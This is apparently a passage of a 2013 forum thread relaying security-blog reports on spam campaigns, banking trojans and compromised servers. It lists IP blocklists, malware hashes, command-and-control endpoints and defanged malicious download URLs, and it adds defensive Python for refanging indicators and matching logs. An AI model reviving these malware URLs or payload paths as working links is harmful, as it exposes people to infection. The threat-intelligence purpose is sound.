28 May 2013 - "The IPs 158.255.212.96 and 158.255.212.97 (EDIS GmbH, Austria) are hosting malware used in injection attacks (see this example* for fussball-gsv .de). These two** examples*** report a TDS URL pattern which is resistant to automated analysis. The domains appear to be part of a traffic exchanger system (never a good idea), but they have been used to distribute malware... In the cases where no malware has been reported it may well be because Google hasn't visited the site. The domains all have anonymous WHOIS details and have been registered in the past year or so... I can identify a couple more IPs in this cluster, and I would advise you to treat all the domains here as suspect and add them to your blocklist:
158.255.212.96
158.255.212.97
193.102.11.3
205.178.182.1..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=2705726
** http://urlquery.net/report.php?id=2705607
*** http://urlquery.net/report.php?id=2515019
___
fab .com SPAM
[Via the WeAreSpammers blog]
- http://blog.dynamoo.com/2013/05/fabcom-spam.html
28 May 2013 - "I've never heard of fab .com before, but online comments are very negative*. Originating IP is 65.39.215.63 (Sailthru / Peer 1, US) spamvertising mailer.eu.fab .com on 63.251.23.249 (Insight Express LLC, US) which in turn leads to the main site of fab .com on 184.73.196.153 (Amazon .com, US). Avoid."
From: Fab
To: donotemail @wearespammers .com
Date: 27 May 2013 17:26
Subject: Invite from jenotsxx @gmail .com to Fab
Mailing list: tm.3775.3198a5cdc7466d097e36916b482cde87.sailthru .com
Signed by: eu.fab .com
* https://www.google.co.uk/search?&q=%22fab.com%22+spam
___
BANKER Malware hosted in compromised Brazilian gov't sites
- http://blog.trendmicro.com/trendlabs-security-intelligence/banker-malware-hosted-in-compromised-brazilian-government-sites/
28 May 2013 - "Two Brazilian government websites have been compromised and used to serve malware since April 24. We spotted a total of 11 unique malware files being distributed from these sites, with filenames that usually include “update”, “upgrade”, “Adobe”, “FlashPlayer” or combinations thereof. Besides the different filenames, these samples also have different domains where they can connect to download other malicious files, as well as varying command-and-control (C&C) servers... 90% of the affected customers are from Brazil. Other affected countries include the United States and Angola.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/05/BANKER_malware_percountry.jpg
The general behavior of these malicious files (detected as TROJ_BANDROP.ZIP) is similar. They drop two files: one executable file (detected as TSPY_BANKER.ZIP) and a supposed GIF file (detected as JAVA_BANKER.ZIP) in the system’s temporary folder. The executable file modifies the Windows registry to lower the system’s security settings, and ultimately loads the .GIF file. The “GIF file” is actually a Java file, loaded using the javaw.exe executable, which is part of the Java Runtime Environment. JAVA_BANKER.ZIP contains commands that can download and execute files from several pre-configured URLs. The downloaded files are then saved as %User Profile%\update.gif (also detected as JAVA_BANKER.ZIP) and executed. These JAR files use several open source libraries such as Java Secure Channel (JSch) and Java Native Access (JNA). These libraries can be used for network operations, in particular connecting to an SSH server, port forwarding, file transfers among others. The final payload of JAVA_BANKER.ZIP is a .JAR file, which elevates the affected user’s administrator rights. Given that the attacker has taken control of the system, modifying the victim’s admin rights enables him to modify the normal system file termsvr.dll. This .DLL is mainly used for remote desktop sessions. The malware will replace this file with %Temp%\update.gif... Compromising and using government sites to deliver malware is not an unusual practice. Earlier this month, a website of the US Department of Labor was compromised to serve a zero-day Internet Explorer exploit. This tactic provides a certain social engineering leverage, as government-related sites are usually deemed safe and secure. But as this incident clearly shows, there is no sacred cow when it comes to cybercrime. Everyone is fair game..."
:mad: :fear:
AplusWebMaster
2013-05-29, 15:02
FYI...
Ruby on Rails attack installs bot ...
- http://h-online.com/-1872588
29 May 2013 - "Over the past few days, criminals have increasingly attempted to compromise servers via a security hole in the Ruby on Rails (RoR) web application framework. Successful intruders install a bot that waits for further instructions on an IRC channel. On his blog*, security expert Jeff Jarmoc reports that the criminals are trying to exploit one of the vulnerabilities described by CVE-2013-0156**. Although the holes were closed back in January, more than enough servers on the net are probably still running an obsolete version of Ruby... The bot appears in the process list as "– bash". When launched, it also creates a file called /tmp/tan.pid to ensure that only one instance of the bot will be executed. Those who run a server with Ruby on Rails should always make sure to have the current RoR version installed. The current versions of Ruby on Rails are 3.2.13, 3.1.12 and 2.3.18."
* http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/
"... Exploit activity is reportedly sourcing from * 88.198.20.247 * 95.138.186.181 * 188.190.126.105..."
** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0156 - 7.5 (HIGH)
*** http://rubyonrails.org/download
- http://weblog.rubyonrails.org/releases/
- http://atlas.arbor.net/briefs/index#-789014484
Elevated Severity
May 30, 2013 - "... Monitoring for outbound connections to IRC ports on cvv4you .ru, 188.190.124.120, 188.190.124.81 is recommended to find compromised systems that may still be at risk..."
___
Fake Citibank emails serve malware ...
- http://blog.webroot.com/2013/05/29/cybercriminals-resume-spamvertising-citibank-merchant-billing-statement-themed-emails-serve-malware/
May 29, 2013 - "Over the past week, the cybercriminals behind the recently profiled ‘Citibank Merchant Billing Statement‘ themed campaign, resumed operations, and launched yet another massive spam campaign impersonating Citibank, in an attempt to trick its customers into executing the malicious attachment found in the fake emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/05/fake_email_spam_citibank_merchant_billing_statement_malware.png
Detection rate for the malicious executable – MD5: 0bbf809dc46ed5d6c9f1774b13521e72 * ... Trojan-Spy.Win32.Zbot.lvpo.
Once executed, the sample starts listening on port 12674. It then drops the following MD5s on the affected hosts:
MD5: 6044cc337b5dbf82f8746251a13f0bb2
MD5: d20d915dbdcb0cca634810744b668c70
MD5: 758498d6b275e58e3c83494ad6080ac2 ...
It then phones back to the following C&C servers:
78.161.154.194 :25633
186.29.77.250 :18647
190.37.115.43 :29609
187.131.8.1 :13957
181.67.50.91 :27916
8.161.154.194
186.29.77.250
190.37.115.43
187.131.8.1
181.67.50.91
84.59.222.81
211.209.241.213
108.215.44.142
122.163.41.96
99.231.187.238
89.122.155.200
79.31.232.136
142.136.161.103
63.85.81.254
98.201.143.22
110.164.140.144
195.169.125.228
190.83.222.173
96.29.242.234
178.251.75.50
199.21.164.167
180.92.159.2
213.43.242.145
94.240.224.115
2.187.51.145
208.101.114.115
50.97.98.134
41.99.119.243
197.187.33.59
79.106.11.64
178.89.68.255
190.62.162.200
165.98.119.94
94.94.211.18 ..."
(More details at the webroot URL above.)
* https://www.virustotal.com/en/file/00b832b5128a7caffe8bd4a854b1e112d488acb37f3a787245d077ae0d106400/analysis/
File name: Statement 57-27-05-2013.exe
Detection ratio: 32/47
Analysis date: 2013-05-29
___
University of Illinois CS department compromised
- http://blog.dynamoo.com/2013/05/university-of-illinois-cs-department.html
29 May 2013 - "There's a bunch of malware sites infesting University of Illinois CS department machines in the 128.174.240.0/24 range, mostly pointed out in this post. Compromised machines are tarrazu.cs.uiuc .edu, croft.cs.illinois .edu, tsvi-pc.cs.uiuc .edu, mirco.cs.uiuc .edu, ytu-laptop.cs.uiuc .edu, node3-3105.cs.uiuc .edu and they are on the following IPs with the following malicious domains (I would recommend blocking the whole /24):
128.174.240.37 ...
128.174.240.52 ...
128.174.240.53 ...
128.174.240.74 ...
128.174.240.153 ...
128.174.240.213 ..."
(More domains listed at the dynamoo URL above.)
Update: the University says that this was a single machine on the network which has now been cleaned up.
___
Malware sites to block 29/5/13
- http://blog.dynamoo.com/2013/05/malware-sites-to-block-29513.html
29 May 2013 - "These domains and IP addresses are connected to this malware spam run* and belong to a group I call the "Amerika" gang (because they tend to use fake US addresses for their WHOIS details but really seem to be Russian). It's quite a long set of lists: first there is a list of malware domains, then a list of malicious IPs and their web hosts, followed by a plain recommended blocklist of IPs for copy-and-pasting... You might notice something odd going on at the University of Illinois in the 128.174.240.0/24 range. Hmm...
Recommended IP blocklist:
5.175.155.183
37.131.214.69
41.89.6.179
42.62.29.4
50.193.197.178
54.214.22.177
62.109.28.0/22
77.237.190.0/24
82.50.45.42
91.93.151.127
91.193.75.0/24
94.249.208.228
95.43.161.50
99.61.57.201
103.7.251.36
109.169.64.170
112.196.2.39
114.4.27.219
114.247.121.139
115.28.35.163
122.160.51.9
128.174.240.0/24
140.117.164.154
151.1.224.118
159.253.18.0/24
162.209.12.86
166.78.136.235
177.5.244.236
178.20.231.214
178.209.126.87
181.52.237.17
183.82.221.13
186.215.126.52
188.32.153.31
190.106.207.25
192.154.103.81
192.210.216.53
197.246.3.196
201.65.23.153
201.170.148.171
204.45.7.213
208.68.36.11
210.61.8.50
212.179.221.31
213.113.120.211
217.174.211.1
222.200.187.83 ..."
(More detail at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/05/amazoncom-spam-federal-credit-unioncom.html
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Scanned Document Attachment E-mail Messages - 2013 May 29
Malicious Personal Pictures Attachment E-mail Messages - 2013 May 29
Fake Electronic Payment Cancellation E-mail Messages - 2013 May 29
Fake Invoice Statement Attachment E-mail Messages - 2013 May 29
Fake Sample Product Offering E-mail Messages - 2013 May 29
Fake Bank Account Statement E-mail Messages - 2013 May 29
Fake Order Invoice Notification E-mail Messages - 2013 May 29
Fake Billing Statement E-mail Messages - 2013 May 29
Fake Credit Card Fraud Alert E-mail Messages - 2013 May 29
Fake Bank Deposit Notification E-mail Messages - 2013 May 29
Fake Payment Transfer Notification E-mail Messages - 2013 May 29
Fake Purchase Order Request E-mail Messages - 2013 May 29
Fake Product Quote Inquiry E-mail Messages - 2013 May 29
(Links with more detail available at the cisco URL above.)
:fear::fear: :mad:
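The indicators in this thread are posted defanged ("hxxp ://", "example .com", "1.2.3.4 :8080", dynamoo's [donotclick]) and mix bare IPs, CIDR ranges, IP:port pairs and domains. Before any of them can be checked against egress logs they have to be refanged and classified, and a domain indicator should also catch its subdomains (the Medfos post below notes hundreds of them per C&C domain). The script below is an added example written for this page, not code from dynamoo, Webroot, Arbor or ThreatTrack: the indicator list is copied from the posts above as written, while the key=value log format and the log lines themselves are constructed to exercise the matcher, so the LOG_RE pattern is an assumption to adapt to a real proxy or firewall export.

```python
"""Refang the space-defanged indicators used in this thread and check
proxy/firewall log lines against them (exact IP, CIDR, IP:port, domain and
its subdomains). Added example; the log format and lines are constructed."""
import ipaddress
import re
from typing import List, NamedTuple, Optional, Tuple

# Indicators copied from the posts above, still defanged as posted.
RAW_IOCS = [
    "116.122.158.195 :8080/ponyb/gate.php",   # ThreatTrack: ADP / UPS spam
    "mail.yaklasim .com:8080/ponyb/gate.php",
    "78.161.154.194 :25633",                  # Webroot: Citibank Zbot C&C
    "62.109.28.0/22",                         # dynamoo recommended blocklist
    "128.174.240.0/24",
    "cvv4you .ru",                            # Arbor: RoR bot IRC C&C
    "188.190.124.120",
    "[donotclick]4rentconnecticut .com/news/cross_destroy-sets-separate.php",
    "hxxp ://85.143.166.158 /fexco/com/index.php",
]


class Indicator(NamedTuple):
    raw: str
    kind: str            # "net" or "domain"
    value: object        # ip_network or lower-cased domain
    port: Optional[int]  # None means any port


def refang(ioc: str) -> str:
    """Undo 'hxxp ://', 'example .com', '1.2.3.4 :80' and dynamoo's [donotclick]."""
    s = re.sub(r"\[donotclick\]", "", ioc.strip(), flags=re.I)
    s = re.sub(r"\s*([.:/])\s*", r"\1", s)   # drop the spaces around . : /
    return re.sub(r"^hxxp", "http", s, flags=re.I)


def parse_indicator(ioc: str) -> Indicator:
    s = re.sub(r"^https?://", "", refang(ioc), flags=re.I)
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}/\d{1,2}", s):          # bare CIDR
        return Indicator(ioc, "net", ipaddress.ip_network(s, strict=False), None)
    host, _, port = s.split("/", 1)[0].partition(":")                 # IPv4 only
    p = int(port) if port else None
    try:
        return Indicator(ioc, "net", ipaddress.ip_network(host), p)   # single IP -> /32
    except ValueError:
        return Indicator(ioc, "domain", host.lower().rstrip("."), p)


# Constructed key=value egress log format; adapt the regex to your own export.
LOG_RE = re.compile(r"dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)(?:\s+host=(?P<host>\S+))?")


def match_line(line: str, indicators: List[Indicator]) -> Optional[str]:
    """Return the raw indicator that the log line hits, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    dst = ipaddress.ip_address(m["dst"])
    dport = int(m["dport"])
    host = (m["host"] or "").lower()
    for ind in indicators:
        if ind.port is not None and ind.port != dport:
            continue                                 # port-qualified IOC, other port
        if ind.kind == "net" and dst in ind.value:
            return ind.raw
        if ind.kind == "domain" and (host == ind.value or host.endswith("." + ind.value)):
            return ind.raw                           # subdomains of a C&C domain count
    return None


def scan(lines: List[str], indicators: List[Indicator]) -> List[Tuple[int, str]]:
    hits = []
    for n, line in enumerate(lines, 1):
        hit = match_line(line, indicators)
        if hit:
            hits.append((n, hit))
    return hits


SAMPLE_LOG = [  # constructed lines, not real traffic
    "2013-05-29T10:12:03Z src=10.0.0.5 dst=62.109.29.17 dport=80 host=www.example.org",
    "2013-05-29T10:12:09Z src=10.0.0.5 dst=116.122.158.195 dport=8080 host=116.122.158.195",
    "2013-05-29T10:13:44Z src=10.0.0.7 dst=116.122.158.195 dport=443",
    "2013-05-29T10:14:01Z src=10.0.0.9 dst=93.184.216.34 dport=6667 host=irc.cvv4you.ru",
    "2013-05-29T10:15:22Z src=10.0.0.9 dst=93.184.216.34 dport=80 host=www.google.com",
]

if __name__ == "__main__":
    for n, raw in scan(SAMPLE_LOG, [parse_indicator(x) for x in RAW_IOCS]):
        print(f"line {n}: {raw}")
```

Line 3 of the sample is deliberately left unmatched: the ThreatTrack indicator carries port 8080, so the same host on 443 slips past a port-qualified match. When the post gives a bare IP as well (as Webroot does for most of its C&C list), add the bare form too, or drop the port qualifier before loading the list; the tighter match is only worth keeping where the host is otherwise legitimate shared infrastructure.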
AplusWebMaster
2013-05-31, 00:28
FYI...
Fake ADP Funding Notification - Debit Draft
- http://threattrack.tumblr.com/post/51739676575/adp-funding-notification-debit-draft
May 30, 2013 - "Subjects Seen:
ADP Funding Notification - Debit Draft
ADP Invoice Reminder
Typical e-mail details:
Your Transaction Report(s) have been uploaded to the web site:
https :/ /www.flexdirect. adp .com/client/login.aspx
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
Thank You,
ADP Benefit Services
Malicious URLs
www .primolevi .gov.it/andromeda/index.html
annbrauner .com/yeltsin/index.html
www. omegaservice .it/ulcerate/index.html
www. sweethomesorrento .it/unwell/index.html
www. italtrike .tv/tomboys/index.html
kalimat.egyta .com/swearer/titan.js
www. asitecsrl .com/servicemen/ethic.js
www. mbbd .it/dzerzhinsky/bewilders.js
4rentcoloradosprings .com/news/cross_destroy-sets-separate.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3fbaedcc125a00077dc97c7dd8c59d82/tumblr_inline_mnmkcb1bxv1qz4rgp.png
___
Fake ADP SPAM / 4rentconnecticut .com and 174.140.171.233
- http://blog.dynamoo.com/2013/05/adp-spam-4rentconnecticutcom-and.html
30 May 2013 - "These fake ADP spams lead to malware on 4rentconnecticut .com:
Date: Thu, 30 May 2013 12:41:28 -0500 [13:41:28 EDT]
From: "ADPClientServices @adp .com" [ADPClientServices @adp .com]
Subject: ADP Funding Notification - Debit Draft
Your Transaction Report(s) have been uploaded to the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
Thank You,
ADP Benefit Services
====================
Date: Thu, 30 May 2013 08:45:16 -0800 [12:45:16 EDT]
From: ADP Inc [ADP_FSA_Services @ADP .com]
Subject: ADP Invoice Reminder
Your latest ADP Dealer Services Invoice is now available to view or pay online at ADP Online Invoice Management .
To protect the security of your data, you will need to enter your ID and password, then click on Access your Online Invoice Management account.
Total amount due by May 31, 2013
$26062.29
If you have already sent your payment please disregard this friendly reminder and Thank you for choosing ADP.
Questions about your bill?
Contact David Nieto by Secure Mail.
Note: This is an automated email. Please do not reply.
The link in the email goes to a legitimate -hacked- site and then tries to load three different scripts, currently:
[donotclick]kalimat.egyta .com/swearer/titan.js
[donotclick]www.asitecsrl .com/servicemen/ethic.js
[donotclick]www.mbbd .it/dzerzhinsky/bewilders.js
From there the victim is directed to the main malware landing page at [donotclick]4rentconnecticut .com/news/cross_destroy-sets-separate.php on 174.140.171.233 (DirectSpace LLC, US). A look at URLquery shows many suspect URLs on this server* and VirusTotal also reports several malicious URLs**. It appears that every single domain on this server has been compromised. Blocking the IP address is the easiest way to mitigate against this problem..."
* http://urlquery.net/search.php?q=174.140.171.233&type=string&start=2013-05-15&end=2013-05-30&max=50
** https://www.virustotal.com/en/ip-address/174.140.171.233/information/
___
Fake NewEgg .com SPAM / 174.140.171.233
- http://blog.dynamoo.com/2013/05/neweggcom-spam-174140171233.html
30 May 2013 - "This fake NewEgg.com spam leads to malware on 174.140.171.233:
Date: Thu, 30 May 2013 16:06:12 +0000 [12:06:12 EDT]
From: Newegg [info @newegg .com]
Subject: Newegg.com - Payment Charged...
Screenshot: https://lh3.ggpht.com/-m_EUbjfZItE/Uae8YrA4CZI/AAAAAAAABPs/iNxxtEdGGnc/s1600/newegg2.png
The malicious payload is any one of a number of domains hosted on 174.140.171.233 which is also being used in this attack*. Blocking the IP is the easiest way to protect against the malicious sites hosted on that server."
* http://blog.dynamoo.com/2013/05/adp-spam-4rentconnecticutcom-and.html
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Report Summary E-mail Messages - 2013 May 30
Fake Scanned Document Attachment E-mail Messages - 2013 May 30
Fake Contract Document Information E-mail Messages - 2013 May 30
Fake Product Supply Quote E-mail Messages - 2013 May 30
Fake Electronic Payment Cancellation E-mail Messages - 2013 May 30
Malicious Attachment E-mail Messages - 2013 May 30
Fake Business Complaint Notification E-mail Messages - 2013 May 30
Fake Payroll Report E-mail Messages - 2013 May 30
Fake Product Supply Request E-mail Messages - 2013 May 30
(Links and more detail at the cisco URL above.)
:fear::fear:
AplusWebMaster
2013-05-31, 13:55
FYI...
Fake Vodafone SPAM serving malware in the wild ...
- http://blog.webroot.com/2013/05/31/fake-vodafone-u-k-images-themed-malware-serving-spam-campaign-circulating-in-the-wild/
May 31, 2013 - "We have just intercepted yet another spamvertised malware serving campaign, this time impersonating Vodafone U.K., in an attempt to trick the company’s customers into thinking that they’ve received an image. In reality, once users execute the malicious attachments, their PCs automatically join the botnet operated by the cybercriminal...
Detection rate for the malicious executable – MD5: 4e148480749937acef8a7d9bc0b3c8b5 * ... VirTool:Win32/Obfuscator.ACP; Backdoor.Win32.Androm.sed.
Once executed, the sample creates an Alternate Data Stream (ADS) –
C:\Documents and Settings\User\Application Data\dbgbshes\habeegeg.exe:Zone.Identifier, as well as installs itself at Windows startup.
It then creates the following files on the affected hosts:
C:\Documents and Settings\User\Application Data\dbgbshes\habeegeg.exe
C:\DOCUME~1\User\LOCALS~1\Temp\IMG.JPEG.exe
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\system32\wbem\wbemdisp.TLB ...
It then phones back to the following C&C server:
hxxp ://85.143.166.158 /fexco/com/index.php ..."
* https://www.virustotal.com/en/file/a7ebf5572e51fe7d5ba9969c77b3fa093b159c55b24d1b9963cf7187e9338678/analysis/
File name: IMG 9857648740.JPEG.exe
Detection ratio: 29/47
Analysis date: 2013-05-29
- http://centralops.net/co/DomainDossier.aspx
85.143.166.158
canonical name webcluster.oversun.clodo .ru.
addresses 62.76.181.230 * 62.76.181.229
inetnum: 85.143.164.0 - 85.143.167.255
descr: 192012, St.Petersburg
country: RU
___
Medfos sites to block 31/5/13
- http://blog.dynamoo.com/2013/05/medfos-sites-to-block-31513.html
31 May 2013 - "The following domains and IPs are currently being used as C&C servers by the Medfos family of trojans* (this** one*** in particular):
84.32.116.110
85.25.132.55
173.224.210.244
184.82.62.16
188.95.48.152 ...
The domains listed are used in conjunction with hundreds of subdomains. Blocking the main domain will be the best approach, else the ones that I have been able to determine are listed here****."
* http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fMedfos
** https://www.virustotal.com/en/file/9a86e358ed6154025f23bdbf2b39df3bad1f078086ff9492441642c82c7fb399/analysis/
*** http://www.threatexpert.com/report.aspx?md5=5b609450d101ff9ba921cabf331d1e39
**** http://pastebin.com/L9UuMAC7
___
USSR old domain name attracts cybercriminals
- https://www.nytimes.com/aponline/2013/05/31/world/europe/ap-eu-soviet-hacker-haven.html
May 31, 2013 AP - "... the .su Internet suffix assigned to the USSR in 1990 has turned into a haven for hackers who've flocked to the defunct superpower's domain space to send spam and steal money... other obscure areas of the Internet, such as the .tk domain associated with the South Pacific territory of Tokelau, have been used by opportunistic hackers... The most notorious site was Exposed .su, which purportedly published credit records belonging to President Barack Obama's wife, Michelle, Republican presidential challengers Mitt Romney and Donald Trump, and celebrities including Britney Spears, Jay Z, Beyonce and Tiger Woods. The site is now defunct. Other Soviet sites are used to control botnets — the name given to the networks of hijacked computers used by criminals to empty bank accounts, crank out spam, or launch attacks against rival websites. Internet hosting companies generally eliminate such sites as soon as they're identified. But Swiss security researcher Roman Huessy, whose abuse.ch blog* tracks botnet control sites, said hackers based in Soviet cyberspace can operate with impunity for months at a time. Asked for examples, he rattled off a series of sites actively involved in ransacking bank accounts or holding hard drives hostage in return for ransom — brazenly working in the online equivalent of broad daylight..."
* https://www.abuse.ch/?p=3581
:fear::mad:
AplusWebMaster
2013-06-01, 15:20
FYI...
NACHA .ZIP file attachment spam
- http://threattrack.tumblr.com/post/51863523782/nacha-zip-file-attachment-spam
June 1, 2013 - "Subjects Seen:
ACH Payment rejected: #<uniq_id>
Typical e-mail details:
Ach payment canceled Transaction ID: #[removed] The ACH transaction, recently initiated from your checking account (by you or any other person), was canceled by the other financial institution.
Transaction Status: Rejected Transaction ID: [uniq number removed]
Amount : $
To view more details for this transaction , please check the attached file .
NACHA works to maintain the privacy of any personally identifiable information (name, mailing address, e-mail address, etc.) that may be collected though our Web site. This Web site has security measures in place; however, NACHA does not represent, warrant or guarantee that personal information will be protected against unauthorized access, loss, misuse or alterations. Similarly, NACHA disclaims liability for personal information submitted through this Web site. Users are hereby advised that they submit such personal information at their own risk.
Thank you,
13450 Sunrise Valley Drive
Suite 100 Herndon
VA 20171
© 2013 NACHA - The Electronic Payments Association
Malicious URLs
Spam contains a malicious attachment.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f807fca5650acf400717cc57abd42780/tumblr_inline_mnp9r6IWMy1qz4rgp.png
___
iOS7 announcement prompts themed ransomware kits
- http://community.websense.com/blogs/securitylabs/archive/2013/05/31/iOS7-announcement-prompts-themed-ransomware-kits.aspx
May 31, 2013 - "... phishing domain related to the imminent release of the Apple iOS7 Operating System. As gossips circulate news in the wild about iOS7 after the D11 conference... cybercriminals are setting up a foundation for phishing and malicious activities...
ios7news .net - 85.25.20.153 **
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7140.sshto004.PNG
... As a ransomware toolkit, Silence Locker can generate a malicious file associated with familiar police enforcement pictures, based on the country of the potential victims. For example, in the following page the fake FBI Cyber Squad Investigation team is bound with a binary file that has been uploaded:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/0741.sshto003.PNG
... we noticed that the AutoIT tool was used to package the malware. This conforms to the current trend of packaging malware to make detection more difficult. We continued our investigation by gathering some telemetry about the IP address that hosts this domain (ios7news .net). From what we discovered, it seems that this IP address is also used for other phishing domains... The domain "hxxp ://gamingdaily .us" is most likely a phishing domain for a gaming news website that is also used to host the exploit kit BleedingLife*... both IT news and rumors could be used by the attackers to leverage people's curiosity, as was done here. In this case, we can suppose (due to details such as the open directory access) that the attackers are going to use and configure that domain for malicious activities based on ransomware."
* http://community.websense.com/blogs/securitylabs/pages/bleeding-life-exploit-kit.aspx
"... The Bleeding Life exploit kit uses exploits which can bypass ASLR and DEP, which means this product could be used successfully against Windows 7 and Windows Vista operating systems..."
** https://www.google.com/safebrowsing/diagnostic?site=AS:8972
:mad::fear:
AplusWebMaster
2013-06-03, 18:35
FYI...
Malicious photo attachment Spam
- http://threattrack.tumblr.com/post/52056798783/malicious-photo-attachment-spam
June 3, 2013 - "Subjects Seen:
Check the attachment you have to react somehow to this picture
Typical e-mail details:
Hi there ,
I got to show you this picture in attachment. I can’t tell who gave it to me sorry but this chick looks a lot like your ex-gf. But who’s that dude??
Malicious File Name and MD5:
IMG[removed].zip (724bb53c12ebeb9df3e8525c6e1f9052)
ThreatAnalyzer Report: http://www.threattracksecurity.com/enterprise-security/sandbox-software.aspx
- http://db.tt/2ZLJo3Wq [PDF]
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4f69fbca5498fae1e5de00540ee6e4ba/tumblr_inline_mntm1nK1JB1qz4rgp.png
___
Fivserv Secure Email Notification Spam
- http://threattrack.tumblr.com/post/52070758101/fivserv-secure-email-notification-spam
June 3, 2013 - "Subjects Seen:
Fiserv Secure Email Notification - [removed]
Typical e-mail details:
You have received a secure message
Read your secure message by opening the attachment, SecureMessage_[removed].zip.
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - [removed]
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
To access from a mobile device, forward this message to mobile-- @res.fiserv -- .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly...
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
nourrirnotremonde .org/ponyb/gate.php
zoecopenhagen .com/ponyb/gate.php
goldenstatewealth .com/ponyb/gate.php
190.147.81.28 /yqRSQ.exe
paulcblake .com/ngY.exe
207.204.5.170 /PXVYGJx.exe
netnet-viaggi .it/2L6L.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/59a429729e0a3967dd6de6a7a67b2a00/tumblr_inline_mntxj0rqkk1qz4rgp.png
- http://blog.dynamoo.com/2013/06/fiserv-secure-email-notification-spam.html
3 Jun 2013 - "This spam email contains an encrypted ZIP file with password-protected malware.
Date: Mon, 3 Jun 2013 14:11:14 -0500 [15:11:14 EDT]
From: Fiserv Secure Notification [secure .notification @fiserv .com]
Subject: Fiserv Secure Email Notification - IZCO4O4VUHV83W1
You have received a secure message
Read your secure message by opening the attachment, SecureMessage_IZCO4O4VUHV83W1.zip.
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - Iu1JsoKaQ
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it...
If you have concerns about the validity of this message, please contact the sender directly.
Of course, it would be supremely pointless password protecting a document and then including the password in the email! The file has been password protected in an attempt to thwart anti-virus software. In this case, the password for the file SecureMessage_IZCO4O4VUHV83W1.zip is Iu1JsoKaQ which in turn leads to a file called SecureMessage_06032013.exe (note the date is included in that filename). At the moment the VirusTotal detection rate is a so-so 16/47*. The ThreatTrack analysis** identifies some locations that the malware phones home to:
netnet-viaggi .it
paulcblake .com
74.54.147.146
116.122.158.195
190.147.81.28
194.184.71.7
207.204.5.170 ..."
* https://www.virustotal.com/en/file/8de188a7813dc1d2de3c610828dcdd09b266fba317100d814a7811b6615ca8e6/analysis/1370289657/
File name: SecureMessage_06032013.exe
Detection ratio: 16/47
Analysis date: 2013-06-03
** http://www.dynamoo.com/files/analysis_31012_2994f3319096ad15b31f3f3135add304.pdf
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Secure Message Notification E-mail Messages - 2013 Jun 03
Malicious Attachment E-mail Messages - 2013 Jun 03
Fake Product Order E-mail Messages - 2013 Jun 03
Fake Bank Transfer Notification E-mail Messages - 2013 Jun 03
Fake Customer Complaint Notification E-mail Messages - 2013 Jun 03
Malicious Attachment E-mail Messages - 2013 Jun 03
Fake Order Invoice Notification E-mail Messages - 2013 Jun 03
Fake Payment Confirmation Notification E-mail Messages - 2013 Jun 03
Malicious Attachment E-mail Messages - 2013 Jun 03
Fake Remittance Slip with Invalid Digital Signature E-mail Messages - 2013 Jun 03
Fake Scanned Document Attachment E-mail Messages - 2013 Jun 03
Fake Product Order Quotation E-mail Messages - 2013 Jun 03
Fake Product Order Request E-mail Messages - 2013 Jun 03
Fake Online Dating Personal Photos Sharing E-mail Messages - 2013 Jun 03
Fake Purchase Order Request E-mail Messages - 2013 Jun 03
Fake Online Dating Proposal E-mail Messages - 2013 Jun 03
Fake Product Order Quotation E-mail Messages - 2013 Jun 03
Fake Processes and Subpoenas Notification E-mail Messages - 2013 Jun 03
(More detail and links available at the cisco URL above.)
:mad: :fear:
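The Fiserv and Vodafone posts above describe three attachment tricks: a password-protected ZIP whose password travels in the same mail, an executable rebuilt each day with the send date encoded in its name (SecureMessage_06032013.exe), and an .exe hidden behind an image extension (IMG.JPEG.exe). The following is an added example, not code from ThreatTrack, Dynamoo or the forum poster, that turns those observations into a mail-gateway triage check; the MMDDYYYY date layout and the extension lists are assumptions taken from the names quoted in this thread.

```python
"""Attachment-name triage for the spam tricks quoted in this thread.

Added example, not code from ThreatTrack, Dynamoo or the forum poster.
It checks an attachment name for the patterns described above:
  * an executable hidden behind an image/document extension (IMG.JPEG.exe),
  * a send date encoded into the executable name (SecureMessage_06032013.exe,
    USPS_Label_06062013.exe), i.e. a sample rebuilt for each day's run,
  * a "secure message" ZIP whose password travels in the same email.
The date format (MMDDYYYY, optionally dash-separated) is an assumption taken
from the names quoted in the thread; other campaigns may differ.
"""
import re
from datetime import date

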